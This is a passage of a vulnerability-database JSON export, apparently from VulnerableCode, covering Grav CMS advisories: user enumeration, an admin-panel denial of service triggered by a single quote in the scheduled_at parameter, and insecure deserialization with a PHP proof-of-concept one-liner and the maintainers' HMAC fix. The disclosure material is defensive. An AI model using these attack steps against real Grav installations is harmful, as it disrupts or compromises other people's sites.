                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/9d01140a63c77075ef09b26ef57cf186138151a5"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34251",
                    "reference_id": "CVE-2023-34251",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-34251"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-f9jf-4cp4-4fq5",
                    "reference_id": "GHSA-f9jf-4cp4-4fq5",
                    "reference_type": "",
                    "scores": [],
                    "url": "https://github.com/advisories/GHSA-f9jf-4cp4-4fq5"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5",
                    "reference_id": "GHSA-f9jf-4cp4-4fq5",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "10",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "9.1",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H"
                        },
                        {
                            "value": "CRITICAL",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track*",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2024-12-27T16:52:48Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-f9jf-4cp4-4fq5"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/65586?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.7.42",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-1ps5-3k43-p3fa"
                        },
                        {
                            "vulnerability": "VCID-4a2z-37a3-2qaw"
                        },
                        {
                            "vulnerability": "VCID-5kr2-3ywy-9kcn"
                        },
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-7jaz-7xjc-kka1"
                        },
                        {
                            "vulnerability": "VCID-9j1y-z47y-xudz"
                        },
                        {
                            "vulnerability": "VCID-9tu1-4n1t-6bgv"
                        },
                        {
                            "vulnerability": "VCID-a375-aqzf-r7gw"
                        },
                        {
                            "vulnerability": "VCID-a8df-4jgt-gba4"
                        },
                        {
                            "vulnerability": "VCID-a8y8-y4zt-zqbv"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-abwg-zvc9-w7dq"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-bafn-ne38-nucy"
                        },
                        {
                            "vulnerability": "VCID-bhhz-z132-zkhb"
                        },
                        {
                            "vulnerability": "VCID-bwvg-jg4z-nyhp"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-egxp-rctq-xyh8"
                        },
                        {
                            "vulnerability": "VCID-esjd-ztwe-c3h1"
                        },
                        {
                            "vulnerability": "VCID-f3wx-5ayr-tqga"
                        },
                        {
                            "vulnerability": "VCID-fmmu-r77k-c7g2"
                        },
                        {
                            "vulnerability": "VCID-k8fd-bqpk-2qg8"
                        },
                        {
                            "vulnerability": "VCID-kbnn-6uws-kqh9"
                        },
                        {
                            "vulnerability": "VCID-p1u7-9mk4-fkcr"
                        },
                        {
                            "vulnerability": "VCID-p5d4-8rvg-uqem"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-rj4b-8dyu-juen"
                        },
                        {
                            "vulnerability": "VCID-ru55-uj84-p3dr"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-ss11-shq5-qqae"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-v8u1-nbxw-a7fr"
                        },
                        {
                            "vulnerability": "VCID-v9n7-vann-6fa5"
                        },
                        {
                            "vulnerability": "VCID-vm87-35gf-eyft"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        },
                        {
                            "vulnerability": "VCID-y7vc-cx37-7ubs"
                        },
                        {
                            "vulnerability": "VCID-yh73-zyju-vqge"
                        },
                        {
                            "vulnerability": "VCID-ymnw-h6as-fbe5"
                        },
                        {
                            "vulnerability": "VCID-zg5t-uqx2-87fw"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.7.42"
                }
            ],
            "aliases": [
                "CVE-2023-34251",
                "GHSA-f9jf-4cp4-4fq5"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-m1sj-emwx-5fek"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49330?format=api",
            "vulnerability_id": "VCID-p1u7-9mk4-fkcr",
            "summary": "Grav Admin Plugin vulnerable to User Enumeration & Email Disclosure\nA **user enumeration and email disclosure vulnerability** exists in Grav **v1.7.49.5** with Admin plugin **v1.10.49.1**.\nThe \"Forgot Password\" functionality at `/admin/forgot` leaks information about valid usernames and their associated email addresses through distinct server responses.\nThis allows an attacker to enumerate users and disclose sensitive email addresses, which can be leveraged for targeted attacks such as password spraying, phishing, or social engineering.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66307",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00059",
                            "scoring_system": "epss",
                            "scoring_elements": "0.18764",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66307"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/blob/6d673fc7c4f6962756f93ae651371e81f7f20924/classes/plugin/Controllers/Login/LoginController.php#L349"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav-plugin-admin/commit/99f653296504f1d6408510dd2f6f20a45a26f9b0"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66307",
                    "reference_id": "CVE-2025-66307",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66307"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-q3qx-cp62-f6m7",
                    "reference_id": "GHSA-q3qx-cp62-f6m7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-q3qx-cp62-f6m7"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7",
                    "reference_id": "GHSA-q3qx-cp62-f6m7",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "6.5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2025-12-02T20:07:49Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-q3qx-cp62-f6m7"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66307",
                "GHSA-q3qx-cp62-f6m7"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p1u7-9mk4-fkcr"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/49311?format=api",
            "vulnerability_id": "VCID-p5d4-8rvg-uqem",
            "summary": "Grav is vulnerable to a DOS on the admin panel\n# DOS on the admin panel\n**Severity Rating:** Medium \n\n**Vector:** Denial Of Service\n\n**CVE:** XXX\n\n**CWE:** 400 - Uncontrolled Resource Consumption\n\n**CVSS Score:** 4.9\n\n**CVSS Vector:** CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H\n\n## Analysis\n\nA Denial of Service (DoS) vulnerability has been identified in the application related to the handling of `scheduled_at` parameters. Specifically, the application fails to properly sanitize input for cron expressions. By manipulating the `scheduled_at` parameter with a malicious input, such as a single quote, the application admin panel becomes non-functional, causing significant disruptions to administrative operations.\n\nThe only way to recover from this issue is to manually access the host server and modify the `backup.yaml` file to correct the corrupted cron expression.\n\n## Proof of Concept\n\n1) Change the value of the `scheduled_at` parameter to `'` as shown in the following figures at the `http://127.0.0.1/admin/tools` endpoint, and observe the response in the second figure:\n  ![gravdos2](https://github.com/user-attachments/assets/b2d8935f-c8ba-4eda-998a-8a20b3d5ef7c)\n  *Figure: Http request on tool endpoint*\n![gravdos3](https://github.com/user-attachments/assets/2a283254-316a-45b3-a5ac-6804e2494cd7)\n  *Figure: Http response on tool endpoint*\n\n2) When trying to access the admin panel, the panel is broken as shown in the following figure.\nAdditionally, the value change is reflected in the `backup.yaml` file, as shown in the second figure:\n  ![gravdos4](https://github.com/user-attachments/assets/1257adcb-96c4-4b30-864e-9aa01e410ded)\n  *Figure: Error message view*\n![gravdos5](https://github.com/user-attachments/assets/4cef7c49-6a1e-4414-8332-3195aa2dfc77)\n  *Figure: Backup.yaml file*\n\n\n## Workarounds\nNo workaround is currently known.\n\n# Timeline\n**2024-07-24** Issue identified\n\n**2024-09-27** Vendor contacted\n\n\n# About X41 D-Sec GmbH\nX41 is an expert provider for application security services.\nHaving extensive industry experience and expertise in the area of information\nsecurity, a strong core security team of world class security experts enables\nX41 to perform premium security services.\n\nFields of expertise in the area of application security are security centered\ncode reviews, binary reverse engineering and vulnerability discovery.\nCustom research and IT security consulting and support services are core\ncompetencies of X41.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66303",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00138",
                            "scoring_system": "epss",
                            "scoring_elements": "0.3361",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-66303"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/9d11094e4133f059688fad1e00dbe96fb6e3ead7"
                },
                {
                    "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66303",
                    "reference_id": "CVE-2025-66303",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-66303"
                },
                {
                    "reference_url": "https://github.com/advisories/GHSA-x62q-p736-3997",
                    "reference_id": "GHSA-x62q-p736-3997",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/advisories/GHSA-x62q-p736-3997"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997",
                    "reference_id": "GHSA-x62q-p736-3997",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.9",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H"
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "cvssv3.1_qr",
                            "scoring_elements": ""
                        },
                        {
                            "value": "MODERATE",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-03T15:10:29Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/security/advisories/GHSA-x62q-p736-3997"
                }
            ],
            "fixed_packages": [
                {
                    "url": "http://public2.vulnerablecode.io/api/packages/72694?format=api",
                    "purl": "pkg:composer/getgrav/grav@1.8.0-beta.27",
                    "is_vulnerable": true,
                    "affected_by_vulnerabilities": [
                        {
                            "vulnerability": "VCID-6a4v-d3zb-67cq"
                        },
                        {
                            "vulnerability": "VCID-6quf-qqqk-43a1"
                        },
                        {
                            "vulnerability": "VCID-6tq3-4hkt-y3au"
                        },
                        {
                            "vulnerability": "VCID-aa7e-n85b-wbdm"
                        },
                        {
                            "vulnerability": "VCID-agks-r1vd-u3d6"
                        },
                        {
                            "vulnerability": "VCID-athb-nf3a-yyga"
                        },
                        {
                            "vulnerability": "VCID-c9jy-y2dh-x3dg"
                        },
                        {
                            "vulnerability": "VCID-e61c-rd9y-wyhs"
                        },
                        {
                            "vulnerability": "VCID-r2dh-em54-nyfz"
                        },
                        {
                            "vulnerability": "VCID-rcyu-yu31-n7gu"
                        },
                        {
                            "vulnerability": "VCID-seer-x4fd-e7ge"
                        },
                        {
                            "vulnerability": "VCID-tkxm-vt8p-tqgv"
                        },
                        {
                            "vulnerability": "VCID-u7yn-d7uj-57bh"
                        },
                        {
                            "vulnerability": "VCID-xj7v-ry9d-dfh1"
                        }
                    ],
                    "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/getgrav/grav@1.8.0-beta.27"
                }
            ],
            "aliases": [
                "CVE-2025-66303",
                "GHSA-x62q-p736-3997"
            ],
            "risk_score": null,
            "exploitability": null,
            "weighted_severity": null,
            "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-p5d4-8rvg-uqem"
        },
        {
            "url": "http://public2.vulnerablecode.io/api/vulnerabilities/95924?format=api",
            "vulnerability_id": "VCID-r2dh-em54-nyfz",
            "summary": "Grav has Insecure Deserialization in File Cache\n# Insecure Deserialization in File Cache\n\n- **Severity:** High \n- **CWE:** CWE-502\n- **Location:** `system/src/Grav/Framework/Cache/Adapter/FileCache.php`\n- **Sink:** `unserialize($value, ['allowed_classes' => true])`\n\n## Affected version(s)\n\n- **Affected:** `>= 1.7.44` and `<= 1.7.49.5` (verified in current codebase and changelog-covered releases).\n- **Fixed:** No upstream fix identified in the reviewed branch at the time of analysis.\n- **Notes:** Earlier `1.7.x` releases may also be affected, but were not fully back-traced in this review.\n\n## Notes\n`allowed_classes => true` allows object instantiation and does not constrain classes.\n\n## PoC (Primitive Demonstration)\n\n### Preconditions\n- Local PHP runtime.\n- Goal is to validate the deserialization primitive used in cache retrieval.\n\n### Steps\n```bash\nphp -r '\nclass CacheWakeup { public function __wakeup(){ file_put_contents(\"/tmp/grav_filecache_poc.txt\", \"wakeup\"); } }\n\n$payload = serialize(new CacheWakeup());\nunserialize($payload, [\"allowed_classes\" => true]);\n\necho file_exists(\"/tmp/grav_filecache_poc.txt\") ? 
\"FILECACHE_UNSERIALIZE_TRIGGERED\\n\" : \"FILECACHE_UNSERIALIZE_NOT_TRIGGERED\\n\";\n'\n```\n\n### Expected Result\n- Output contains: `FILECACHE_UNSERIALIZE_TRIGGERED`.\n\n### Interpretation\nThis reproduces the same unsafe primitive used by `FileCache::doGet()`:\n`unserialize($value, ['allowed_classes' => true])`.\nIf cache files are attacker-tampered, object magic methods may execute.\n\n## Exploit Preconditions\n- Cache file poisoning/tampering capability.\n\n## Recommendation\n- Avoid object deserialization in cache payloads.\n- Use non-object formats and integrity protection for cache files.\n\n\n\n---\n\n## Maintainer note — fix applied (2026-04-24)\n\nFixed in Grav core on the `2.0` branch: commit [`c66dfeb5f`](https://github.com/getgrav/grav/commit/c66dfeb5f) — will ship in **2.0.0-beta.2**.\n\n**What changed:** `Framework\\Cache\\Adapter\\FileCache` now HMAC-signs every cache payload with `Security::getNonceKey()` on write, and verifies the HMAC on read. Tampered, forged, or pre-upgrade files are treated as cache misses and unlinked instead of being unserialized. The on-disk format is now versioned:\n\n```\nv2\n<expires>\n<key>\n<hmac-hex>\n<serialized>\n```\n\nExisting caches rebuild transparently on first read. Note that `Framework\\Cache\\Adapter\\FileCache` isn't wired into Grav's main cache path — Symfony's `FilesystemAdapter` is — but the class is reachable by plugin and downstream consumers, so the hardening applies defensively.\n\n**Files:**\n- [`system/src/Grav/Framework/Cache/Adapter/FileCache.php`](https://github.com/getgrav/grav/blob/2.0/system/src/Grav/Framework/Cache/Adapter/FileCache.php).\n- [`tests/unit/Grav/Common/Security/FileCacheSecurityTest.php`](https://github.com/getgrav/grav/blob/2.0/tests/unit/Grav/Common/Security/FileCacheSecurityTest.php) — round-trip, tampered-payload rejection, wrong-key forgery rejection, pre-v2 file rebuild, key-field mismatch.",
            "references": [
                {
                    "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-7317",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "0.00066",
                            "scoring_system": "epss",
                            "scoring_elements": "0.20571",
                            "published_at": "2026-06-05T12:55:00Z"
                        }
                    ],
                    "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-7317"
                },
                {
                    "reference_url": "https://github.com/devsamuelsantiago/grav-cms-filecache-object-injection",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/"
                        }
                    ],
                    "url": "https://github.com/devsamuelsantiago/grav-cms-filecache-object-injection"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/5a12f9be8314682c8713e569e330f11805d0a663"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/commit/c66dfeb5f",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "LOW",
                            "scoring_system": "generic_textual",
                            "scoring_elements": ""
                        },
                        {
                            "value": "Track",
                            "scoring_system": "ssvc",
                            "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-29T12:59:03Z/"
                        }
                    ],
                    "url": "https://github.com/getgrav/grav/commit/c66dfeb5f"
                },
                {
                    "reference_url": "https://github.com/getgrav/grav/security/advisories/GHSA-gwfr-jfjf-92vv",
                    "reference_id": "",
                    "reference_type": "",
                    "scores": [
                        {
                            "value": "4.6",
                            "scoring_system": "cvssv2",
                            "scoring_elements": "AV:N/AC:H/Au:S/C:P/I:P/A:P/E:POC/RL:OF/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3",
                            "scoring_elements": "CVSS:3.0/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L/E:P/RL:O/RC:C"
                        },
                        {
                            "value": "5.0",
                            "scoring_system": "cvssv3.1",
                            "scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L"
                        },
                        {
                            "value": "1.3",
                            "scoring_system": "cvssv4",
                            "scoring_elements": "CVSS:4.0/AV:N/AC:H/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P"
                        },
                        {
                            "value": "2.3",
                            "scoring_system": "cvssv4",
